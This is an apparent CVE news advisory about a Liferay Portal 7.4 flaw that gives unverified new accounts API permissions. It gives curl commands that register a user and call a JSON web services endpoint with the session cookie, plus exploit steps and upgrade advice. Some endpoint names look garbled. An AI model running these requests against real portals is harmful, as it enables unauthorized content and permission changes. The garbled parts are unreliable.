Liferay Portal, Improper Access Control, CVE-2025-XXXX (Moderate)

By /

Listen to this Post

How the mentioned CVE works:

In affected versions of Liferay Portal, the access control mechanism contains a flaw where API endpoints are not properly gated by the user’s email verification status. Upon account registration, a user is granted a session and associated permissions before completing the required email verification step. This allows a remote attacker to register a new account and immediately interact with APIs that should be restricted to verified users only. The system incorrectly assigns functional permissions pre-verification, enabling unauthorized actions such as accessing, creating, or editing content via the JSON web services API. This bypasses a critical security control, as the portal assumes unverified accounts are untrusted and should have limited system access.
Platform: Liferay Portal/DXP
Version: 7.4.0 – 7.4.3.109
Vulnerability : Improper Access Control
Severity: Moderate
date: 2025-10-27

Prediction: 2025-11-10

What Undercode Say:

curl -X POST 'http://<target>/api/jsonws/user/add-user' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'companyId=1&autoPassword=true&password1=test&password2=test&autoScreenName=true&screenName=testuser&[email protected]&facebookId=0&openId=&locale=en_US&firstName=Test&middleName=&lastName=User&prefixId=0&suffixId=0&male=true&birthdayMonth=1&birthdayDay=1&birthdayYear=1901&job=Test&groupIds=&organizationIds=&roleIds=&userGroupIds=&sendEmail=false'
curl -X GET 'http://<target>/api/jsonws/journal/get-s' \
-b 'JSESSIONID=<session_id_from_registration>'

How Exploit:

Register a new user account. Use the provided session ID to call privileged APIs before clicking the verification link sent to the email. Perform unauthorized actions like creating web content s or modifying user permissions through available service endpoints.

Protection from this CVE:

Upgrade to Liferay Portal version 7.4.3.110 or a patched DXP version. If immediate patching is not possible, implement a reverse proxy or Web Application Firewall (WAF) rule to block access to the `/api/jsonws` endpoint for unauthenticated or newly registered sessions.

Impact:

Unauthorized content modification, data integrity loss, privilege escalation. An attacker can deface sites, create malicious content, or alter application data without a verified identity.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top